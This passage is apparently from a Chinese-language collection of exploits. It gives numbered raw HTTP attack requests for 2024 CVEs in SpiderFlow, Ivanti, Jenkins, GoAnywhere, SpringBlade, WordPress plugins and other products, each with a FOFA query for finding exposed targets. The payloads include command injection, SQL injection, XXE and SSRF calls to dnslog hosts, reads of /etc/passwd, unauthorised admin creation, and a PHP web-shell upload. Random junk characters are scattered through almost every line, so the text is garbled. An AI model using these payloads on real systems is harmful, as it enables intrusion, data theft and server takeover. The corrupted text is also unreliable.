& v& l* v# J- B. X3 T; P% rUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15/ ^: D5 @$ E5 y
Accept-Encoding: gzip* Z8 k1 X, s6 ~
Connection: close
. p5 m* m6 ~: U- D: p" F. n4 T9 \Cookie: rememberMe=PAYLOAD2 |. ~8 L5 g! a1 l0 Q4 _  ]
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"' y3 w  K( O  v& U( P3 X

! [  `  a- M! T% V8 ]; d6 _( O, q) a6 p3 l# _% O- c  q+ f+ [6 U
98. SpiderFlow爬虫平台远程命令执行  L* S4 Z4 n$ w; @# B# X$ o
CVE-2024-0195
' {$ D' ^4 J( O  m. u% }; y7 D1 I$ WFOFA:app="SpiderFlow"3 {( T6 q% Q: c: W6 w( [9 S0 J7 t
POST /function/save HTTP/1.1! p& ?5 u) r8 C2 u3 t; ~, `
Host: 192.168.40.130:8088. A# H5 E+ I, g" T5 t9 S& b3 s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0% W$ A' o# Y" u& C0 u2 |
Connection: close
' l; ?6 H6 |+ a" V; OContent-Length: 1214 f5 N. ?4 Y- O) T, B' a
Accept: */*
# g" H& r: @7 J' a! U* u5 [Accept-Encoding: gzip, deflate
4 a1 p) }) Y3 |Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; `% B( W7 G  w4 Y2 @! Q7 L# FContent-Type: application/x-www-form-urlencoded; charset=UTF-8
3 m$ p% ~! `! R! h$ Q3 yX-Requested-With: XMLHttpRequest& @* T  g. p: ?- I
/ J! d# ~; ^6 q( W& S; ]' j- \
id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B) y* Y' u* C9 l% f1 b# w) ?% m

1 n; h* J+ j7 i; M  U) ?3 k. I
0 N% }" \+ y7 m& g1 D$ s% }3 ~+ ^99. Ncast盈可视高清智能录播系统busiFacade RCE
1 I" f# t+ f, }3 ICVE-2024-0305# r) V6 i1 m2 K( _6 W) L
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
. V1 M5 O' H" a4 z" T( wPOST /classes/common/busiFacade.php HTTP/1.1
& g. U0 k7 {' h3 G- W$ BHost: 192.168.40.130:8080
5 S  c4 p5 q$ x4 r& AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
: p. G" H9 S+ q  G5 [! ^  B7 [Connection: close. }: d/ N; a9 w( i) ?. l1 R
Content-Length: 154
" s9 h) C+ j2 m7 l, ]0 I9 d0 |Accept: */*+ ~9 K0 Y! {( {  f& p- O4 e
Accept-Encoding: gzip, deflate+ M0 J) g4 X5 M/ y3 T( o
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* d& C" U  S9 q! ?- s7 K" s
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
* T0 x9 t: t* K$ @& YX-Requested-With: XMLHttpRequest8 X9 ?. O0 W6 @6 l* b& O

7 U* B: X5 N9 T" G9 m- d8 e/ E%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D3 ~& ]1 b( d' t& b, i% C
% f5 {) y" f9 W1 A4 G8 A
& J, v9 N4 Q$ h2 y! s
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传9 g! r* Q( G7 x8 o- T
CVE-2024-0352
7 ?  F/ j, C& {- PFOFA:icon_hash="874152924"
, k' A% l1 P0 oPOST /api/file/formimage HTTP/1.1" @( f3 Q% ^4 b$ i6 Q' Z
Host: 192.168.40.130
/ |* p  [8 c: _/ KUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.362 k6 l$ y4 t" M* J
Connection: close
2 n! w7 ?' M; S! n+ x9 _Content-Length: 201
9 {3 w1 D; r+ K8 H4 L# J: XContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei7 @- p5 w0 D8 m8 Y* C8 L! J
Accept-Encoding: gzip: X6 y# q0 X$ V

- c% ~/ I8 Z9 j# \------WebKitFormBoundarygcflwtei
- O0 W: g( Q; J: i6 u9 rContent-Disposition: form-data; name="file";filename="IE4MGP.php"
0 e. A) E: A% ~$ V# C, j+ i+ ?Content-Type: application/x-php
1 J/ V! t: W' X& l& F9 \) {! H- s' l
2ayyhRXiAsKXL8olvF5s4qqyI2O/ |) t  s8 M4 }  f2 j7 l
------WebKitFormBoundarygcflwtei--+ b. N+ @# k7 K" t; w) G) w

# q$ q( C+ c4 r: c$ Y5 S% B9 A
1 P3 J) v6 [8 T101. ivanti policy secure-22.6命令注入5 [9 G# f- Q& D. @9 [' v
CVE-2024-21887
1 e1 R' e+ X' Q3 z0 lFOFA:body="welcome.cgi?p=logo"
, r' u" P& g! B4 L6 sGET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1; p* N; h( {  q" g
Host: x.x.x.xx.x.x.x& z# }  I2 `3 b  ^% G5 `/ J
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
: X+ _& z$ M5 Y* {/ V+ gConnection: close( n3 H4 A& T% F8 U- _5 q7 y; Q
Accept-Encoding: gzip( O+ x9 ]8 G( l* y0 m
) Q* \+ n7 v% _
  E# {- A7 u/ t0 F6 N/ ~/ @
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
6 c5 |* \6 O1 B/ f7 QCVE-2024-21893% p/ L  e- O' g) j3 W) U
FOFA:body="welcome.cgi?p=logo"& h2 l7 j( f* ~3 G: a6 b
POST /dana-ws/saml20.ws HTTP/1.1' E- {( z) J' A
Host: x.x.x.x$ P( w& E# L# N& X) i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.363 ]& q) r: M; }" i' @/ J/ Y
Connection: close% G) S2 a* @2 U" e% u
Content-Length: 792
3 b5 g* M' C5 O) KAccept-Encoding: gzip  L4 ?$ \! T0 o
+ v, m6 j8 |4 r, z: t3 z
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>9 G$ j% y$ K: ^  O; F

! @- }' t' q5 k; b4 |3 e3 t- k103. Ivanti Pulse Connect Secure VPN XXE6 i" Z# o; i# _7 C
CVE-2024-22024
& x- J: g5 S4 \1 nFOFA:body="welcome.cgi?p=logo"
+ k3 I( T( f0 k5 b6 E0 p1 ePOST /dana-na/auth/saml-sso.cgi HTTP/1.1" K+ k% V) G0 \, X8 x9 y$ @3 e9 k
Host: 192.168.40.130:111
; d( [# V0 i+ U' k1 iUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36# R3 [0 D: o4 S- W: `
Connection: close; b" n* j- D+ \6 J' g; k) B2 |' B
Content-Length: 204/ d+ w7 h- X# U- f3 _( E
Content-Type: application/x-www-form-urlencoded
' w6 L( d" l4 U( O8 F( W9 H% vAccept-Encoding: gzip
) C. |' S" u, ^2 b) l
3 v/ X% {5 _% y9 i3 j2 v. Z! a# k; ySAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==1 @& `: y1 ~" r* A. E& C1 C
9 I$ O* P/ p6 n3 n/ D8 d6 F9 Y

9 A) z# Y) {8 E* y" C其中SAMLRequest的值是xml文件内容的base64值,xml文件如下1 x4 z2 T" y  Z
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
# a7 J6 _6 ]5 l
" {3 I6 B( l9 q$ `5 ^' K/ a; K6 I; k* z
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
3 J5 H( r2 B1 y4 T7 ]4 @1 FCVE-2024-0569
2 \1 F. e7 F; Z1 Q7 l" G0 b: oFOFA:title="TOTOLINK"
5 F( f+ u  x6 n4 z, |POST /cgi-bin/cstecgi.cgi HTTP/1.1
9 f- K- o. u: J# F5 p2 g( R7 wHost:192.168.0.1
: f) d% W/ A- A# n: v5 DContent-Length:41
  g. J5 [' W. Y7 `8 J# F7 NAccept:application/json,text/javascript,*/*;q=0.01  i$ u6 p1 R6 C; F. y# J
X-Requested-with: XMLHttpRequest6 v: J3 t' A* L2 T# ~( s4 t: s' U
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36$ ^8 i/ v6 M& x
Content-Type: application/x-www-form-urlencoded:charset=UTF-80 P% [7 ]9 ?  y- P1 _2 w
Origin: http://192.168.0.12 N/ ~! N1 U0 X7 a2 F( S7 R/ [& X# b
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
% ?& D+ \5 ?8 R9 SAccept-Encoding:gzip,deflate% ~: a5 |# h7 P5 z; d
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7; `, R7 f3 Y8 v+ Z3 b: R/ d* h0 F* a
Connection:close
8 A5 D# Z! F1 @, G, K. r8 q6 P. Z6 E1 b0 U0 Y
{. Y0 Z) L( O$ M7 S, k6 O- f) r
"topicurl":"getSysStatusCfg",. S( g& i$ ^( t- L9 P* ]8 ~
"token":"": D* X8 F1 @4 c) ]" Y7 _
}
/ v3 V% R  _% ^* [3 D, b# L5 J8 t+ ]2 p8 \0 t1 S
105. SpringBlade v3.2.0 export-user SQL 注入
/ p5 g, c/ a. [( l3 cFOFA:body="https://bladex.vip"% |: w; x/ j* a5 R# e
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
+ Q5 }9 C5 k. E* T. y) \
& v( x1 J2 \7 ~4 J106. SpringBlade dict-biz/list SQL 注入& Z) o) \3 e5 q* E
FOFA:body="Saber 将不能正常工作"$ @  Q) J6 K3 a7 j! K8 z  l, k
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1+ [9 M1 K# I- y" s6 A9 ]) k
Host: your-ip
3 d- q5 k; O7 M- x. |. a! _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
: R& C3 K5 P6 [* ?& q+ fBlade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
+ w4 ^, A# g0 D0 O+ G* z4 M, e, I. C9 EAccept-Encoding: gzip, deflate) V% l" C! |4 \- Q
Accept-Language: zh-CN,zh;q=0.9
& v0 g) Q7 q. ~9 uConnection: close
& I- T) v. H: }9 a7 K% h. Q9 w
) h% T" h( O1 G) y; P* e% P! Q1 T0 F; v8 Z4 E
107. SpringBlade tenant/list SQL 注入/ {  O( I5 r) V
FOFA:body="https://bladex.vip". y9 k; v+ }$ p  j
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1: t* A/ E3 m3 x
Host: your-ip
5 j! S4 y2 z& j( k4 B- D4 eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36$ p; T! O8 S9 X! F) c8 Q# T* W0 B0 }
Blade-Auth:替换为自己的4 {% ~$ ?7 x! u* h1 A! a, v% }
Connection: close. a0 @) U' `/ R. A  W- X  n; W$ A1 X* W
/ e* d* \) s5 v1 l
7 K: S8 ]3 L! \8 X+ m: S( o8 h
108. D-Tale 3.9.0 SSRF
) N$ H) }/ }0 D0 w* NCVE-2024-216424 {  M/ r# w# \  ~& q
FOFA:"dtale/static/images/favicon.png"
; k$ H9 P$ S* p% ]' L+ c% X+ N3 FGET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
/ T4 H3 ~$ r  Y( x4 U/ i* hHost: your-ip2 k- O/ E' T4 e1 k$ U
Accept: application/json, text/plain, */*
0 G, t7 m6 |7 m8 S' k0 ^9 w3 h- MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36' P1 e' n. o& E0 q* `
Accept-Encoding: gzip, deflate, J+ H8 x+ g% H9 O( w% q& l
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
1 Z4 r- l+ O$ g8 `0 [; F: iConnection: close9 R4 y. ?2 m/ A8 @& E

( I+ d9 i  Q; M# b/ k" ?- o& j2 }
: J# {$ f8 X5 h2 `6 Y109. Jenkins CLI 任意文件读取
' x6 Q1 H6 G' @% U( M7 ~% r* vCVE-2024-238978 U8 l6 k* X# l1 `
FOFA:header="X-Jenkins"
  ^# ]- T7 d! P6 c- @$ PPOST /cli?remoting=false HTTP/1.1. b9 A7 z/ G; X  O' g) P
Host:
3 G3 ^$ s+ j$ u! [Content-type: application/octet-stream
2 y  {! t0 `1 b, M$ r- j# h+ ZSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
: B( [& Q  l" P* ~6 WSide: upload$ H; _* y5 K" t" |) p) f! S5 s
Connection: keep-alive
8 q6 P3 h' A% s7 @Content-Length: 163( n% y; k" J* X5 ]% c

, |5 E$ t4 v* f$ U& m5 T- P8 v* Q3 U6 Ob'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'1 Q8 z( O8 Z% L
6 ?0 N. M" ]1 q; a; y$ i5 [5 h
8 Y- c+ F2 v$ s' D
POST /cli?remoting=false HTTP/1.19 u1 o: \5 ?3 p3 o
Host:4 t# c( F4 W% e& u
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92" u& b* h& D4 U, B; E
download
. J$ ]# Y8 G$ W* `Content-Type: application/x-www-form-urlencoded! ~# G$ s6 k- r9 s' s: ]. d" _/ q; x
Content-Length: 0
7 z, K) n" V& @: O' L9 k4 a. h  b0 V& O: u2 A  c
; i6 P! E) A! v2 `
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin, z# t( ~& E3 `8 h
java -jar jenkins-cli.jar help
& m# C' t# M" u0 [* o" w$ O0 d[COMMAND]! s( M3 J/ d/ w) s3 O/ W. z
Lists all the available commands or a detailed description of single command.' |& X) h' I  W/ |9 ^" ]
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
1 c! N" |  X3 A7 K
5 M- t' Z; [; T* j
9 w* R7 ]. S" f: l# @$ X5 o110. Goanywhere MFT 未授权创建管理员
% n5 e4 F! V( a1 n3 Q' F- GCVE-2024-0204( m$ h/ x* s7 Q4 \  T# M
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"% n! H1 B' M$ q
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
2 t3 @) o0 N: g2 v) \Host: 192.168.40.130:8000  A- H7 x* t* Z- l" r8 d  |
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36, A: j6 [3 _3 S7 |7 F/ v  N- ?! W! H
Connection: close7 C( A+ w4 a. ?, Q5 i
Accept: */*: Y; ?( v( u) N0 z$ I8 _6 y
Accept-Language: en/ g$ Y/ y; G7 o. I- u6 [* m
Accept-Encoding: gzip1 y, s# E1 Z; K/ y0 Y1 {+ s2 R

" x8 Z! A. N! M* u4 v5 I
; z; ^& M) I* _. _- D: S111. WordPress Plugin HTML5 Video Player SQL注入) l1 o' x  U" t+ Q- w3 C: {
CVE-2024-1061
& w4 x& l& w! [; V! P0 kFOFA:"wordpress" && body="html5-video-player"
( z$ p1 O- B% z6 s" D+ l& t/ QGET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
4 |, ]- e. W  O# R4 kHost: 192.168.40.130:112# j2 k) r: `( {3 _0 }3 N& f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
* \& O! c. T$ ~3 d8 S) o+ P! LConnection: close
; e1 o  z* I2 U. t8 z: g5 [+ JAccept: */*; P) T6 A  a/ N  {- h3 H! E( f
Accept-Language: en
$ s, Z% }' d9 B- ZAccept-Encoding: gzip
9 [' i" Y% _8 W. x8 j! e# X2 f! s8 ]* W. P9 D! N# c
9 T& Q8 A  f: F+ o) R) q
112. WordPress Plugin NotificationX SQL 注入" r+ @/ Y4 Y5 x+ l8 p) H
CVE-2024-16988 |  D0 d) e9 g% [: U) q
FOFA:body="/wp-content/plugins/notificationx"
& w* b0 }6 B& ~( Q3 cPOST /wp-json/notificationx/v1/analytics HTTP/1.1
3 Q( a8 L+ _$ k& W" y. K( f: EHost: {{Hostname}}
( [6 }( B0 {7 N# r8 M1 ~Content-Type: application/json! o( Q4 g9 ]) R" W* a
  {( R" f- J& S- [
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}) q& S# L3 d2 _' Y

5 c$ b8 O! k' b, I9 F; W# c
, o: q& v1 ~+ ], w6 ^" a113. WordPress Automatic 插件任意文件下载和SSRF
$ ~8 h- {+ Y4 z% ^' v& aCVE-2024-27954$ W3 F) B5 D9 d1 _! ^  Z
FOFA:"/wp-content/plugins/wp-automatic"
# a0 {/ f; F( fGET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
+ o/ B& j: C) N. P/ i* d8 jHost: x.x.x.x' j4 Y" p3 B# l) |" w
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36; Z5 {, \7 Y! f$ C+ Q: f
Connection: close6 A' f9 D! o' `- k
Accept: */*, p8 B% j+ l2 s$ j' H4 j
Accept-Language: en( N: C8 ~4 W! v2 r
Accept-Encoding: gzip. }) X# \+ ?- Y7 W$ R, |
( m( G+ C4 X6 Z; r% B/ B' d

$ M9 q& w, W" s& s* d' r& A114. WordPress MasterStudy LMS插件 SQL注入
. r4 T, G% j, Z! LFOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
+ d: E( e% G2 OGET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1, W+ n' k" E0 w1 x2 j. k- j9 f) o6 t
Host: your-ip
' S* u" M/ p3 [3 J! w+ D$ @User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36* H. M  y! E! X$ L1 r) k8 |
Accept-Charset: utf-8
; |0 `  q* V, G9 o- t" S$ kAccept-Encoding: gzip, deflate  f% t# N$ z( j  L: r
Connection: close0 a* Z! e3 V, p3 r' p6 d9 G  ?
, w3 |2 d7 I2 Y" V

9 ~; Y5 g7 I# f  r' z1 m115. WordPress Bricks Builder <= 1.9.6 RCE
+ S7 T* }5 ?6 d; X& G' gCVE-2024-25600
" ?" L: T2 r1 M* |8 w9 y0 |FOFA: body="/wp-content/themes/bricks/"
5 D$ f1 \7 F2 V% q3 a4 g; ]第一步,获取网站的nonce值
6 f- I. y7 Y1 V3 w9 |# R/ XGET / HTTP/1.17 H  H% `- e3 y, R1 j7 [) V
Host: x.x.x.x$ ~$ z% l  N% P  g. W* A" b
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36) z2 t% [/ {" M* l- e, ]+ \
Connection: close
( I, S7 ]" N$ R/ f; CAccept-Encoding: gzip4 j, Q9 \3 h9 B4 p- d0 q

* q1 }' i! [; g5 f5 A
: {. G( u; B* }. O第二步替换nonce值,执行命令! A1 S, f; t" y2 c$ @
POST /wp-json/bricks/v1/render_element HTTP/1.1
, j7 ?: U; g8 UHost: x.x.x.x6 d/ d+ G0 s# |, d  y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36. O1 u3 E) s$ M1 Z1 S- x* U3 N4 ^8 D
Connection: close0 I- {( ?2 T5 I1 e% h* o
Content-Length: 356  U. ?" B  a8 A0 B2 ~5 ?
Content-Type: application/json
# a0 C- t% Z( ~( R4 E# |5 eAccept-Encoding: gzip$ B& ]3 F% Q8 E6 i- Z( q0 W; v% t
7 k) Y0 ]4 g7 D1 m0 n4 }
{4 a. O3 ]6 U! n
"postId": "1",: Z$ z+ W2 H  n5 `
  "nonce": "第一步获得的值",
" ]+ o0 h* s8 G4 |# |  "element": {; \( r7 g6 |# ^4 B
    "name": "container",
& m* w2 l4 s9 T) Z1 T$ q    "settings": {; a, q* w8 X0 n5 E# r* H+ V
      "hasLoop": "true",8 b( n# B7 ~! `- a: i
      "query": {
7 k; e/ t1 P6 ^; I0 s3 m        "useQueryEditor": true,
% x1 f! G2 n+ c: L        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",' k  `1 A5 ?# ]( ~6 O
        "objectType": "post"
0 `$ P3 _: m& J1 b  @7 j" d      }
' Q1 A+ ?/ g9 ]' s$ v' {  R    }! Y6 N" d- f# W! M( Z" y
  }
7 i1 m# B  v' ^' _3 ?}
2 A) g; R# F, D; ?
. |0 h' `" O6 a% {; z8 c
4 x$ N4 u( [6 i# z- F* e& K; j116. wordpress js-support-ticket文件上传
# X8 k$ u% o3 [2 a, WFOFA:body="wp-content/plugins/js-support-ticket"
2 B! |+ L* ]" w& F& Z7 X4 O" nPOST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1# K$ ]% x- H" g! `& f# L- J, p
Host:
5 T1 G9 n8 s: Z* x) x4 GContent-Type: multipart/form-data; boundary=--------767099171
% L4 K+ @, s* S. N# {- yUser-Agent: Mozilla/5.0( y5 p" t6 S( [) Z6 T& Y
! \# d; `- {, j6 ]
----------767099171: Z8 j# i  N8 ^
Content-Disposition: form-data; name="action"' _0 x8 W3 [! ^$ `: w. J
configuration_saveconfiguration
5 ~- ]5 W& @3 m6 n----------767099171
' [8 L' B% ^9 y+ D" z; PContent-Disposition: form-data; name="form_request"/ \9 F+ K! m5 `! B# Z; m' y
jssupportticket2 ?: x+ N9 J& Q
----------767099171  _/ T% M8 ]5 b7 G
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
7 v& q) H8 {0 c- Z  yContent-Type: image/png6 w2 F5 f2 N" o7 d& _+ b
----------767099171--5 B: p; `* {  O2 S( |+ L' O  X

* b  w, k7 [' [/ d2 W8 V2 s" s: O3 X* b
117. WordPress LayerSlider插件SQL注入* y& q9 ]9 f( K# e# w
version:7.9.11 – 7.10.0
* _$ X+ x" e- Q: j- Z# J! XFOFA:body="/wp-content/plugins/LayerSlider/"
2 M9 F; V  N$ u- y. V5 yGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
+ S; I0 C4 ?8 b2 v: v4 M; bHost: your-ip
9 {* a# h9 h) v7 j6 `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.00 m! {# A, t* D9 B# p6 \& p$ C7 L. s
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
4 o, u4 g; n' KAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 {- _5 U4 N+ XAccept-Encoding: gzip, deflate, br3 v% z( f2 f3 [( f# P6 c( l
Connection: close, t, R, V. d- \8 q4 G
Upgrade-Insecure-Requests: 1+ O0 C; |% S6 ?! R( e

; E* \) c; z! ]5 W; J! f$ p" u
7 @! H( J5 g$ x& G118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
% \. |& I/ r8 x, N5 m8 T& [CVE-2024-0939, R+ R$ M) E4 |: Z+ V) F0 g: A! s
FOFA:title="Smart管理平台"6 G6 [- H/ z( z: ]
POST /Tool/uploadfile.php? HTTP/1.15 N' I  c9 Y3 o7 D* j/ _
Host: 192.168.40.130:8443
' L, |+ C/ _( ~Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8- ^' n" C3 T8 f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
$ r, M" C. g8 C4 P, O( w8 @Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.80 s2 p" a1 y! l  b) e: E& ~) c' u
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: d& m7 _2 a" ?6 [
Accept-Encoding: gzip, deflate( `5 u# ]9 ^; p5 N
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
/ b5 T" L' R8 m& r  C" DContent-Length: 405; y0 t8 ~2 g. H. {/ _# n; ~
Origin: https://192.168.40.130:8443) X' v, Z0 g( ]
Referer: https://192.168.40.130:8443/Tool/uploadfile.php" Y+ X0 y+ D8 }7 t5 p
Upgrade-Insecure-Requests: 1# N! r! B, g' J5 ?
Sec-Fetch-Dest: document% t0 m2 e) g! P' ]; _/ ]* Z1 ]
Sec-Fetch-Mode: navigate( P5 }  s" Y/ x6 N. t) |" T
Sec-Fetch-Site: same-origin, L' E) V7 G2 G
Sec-Fetch-User: ?1% F5 i  T1 q& i8 M1 {# p0 S6 L1 e: v
Te: trailers
4 ?/ J* {3 c2 T4 rConnection: close
. s+ |$ [3 U: E, E! m5 a. y- k! }% D# i  K
-----------------------------13979701222747646634037182887
' T3 D: Q3 Y" r# vContent-Disposition: form-data; name="file_upload"; filename="contents.php"9 ~: _+ S2 \; h! ~
Content-Type: application/octet-stream
  ~4 c6 H  C3 ~( g5 r. b" G& }$ ]
: J" E5 e. J* {% E<?php
7 U4 R2 \2 C) u+ B" dsystem($_POST["passwd"]);6 q$ i% [. C1 h6 x
?>2 {/ F, ~( h9 Q4 {; ]) O
-----------------------------13979701222747646634037182887
* v" n+ O6 T# z+ ^- A! @; v6 l' j7 V: _Content-Disposition: form-data; name="txt_path"! o+ \% R2 @$ y, w: n
3 |! E# |* P  v$ h5 a6 o
/home/src.php
. Z5 R" t& A; F& q-----------------------------13979701222747646634037182887--
. k4 r' w: f( \0 C8 o$ y2 |$ ?1 o
# r) ^4 w2 B5 K" M( s, O
$ b" T4 @; P, H8 H访问/home/src.php
0 l' t% i8 ^4 B! w( e9 }3 \$ ?1 [' {1 g/ Q
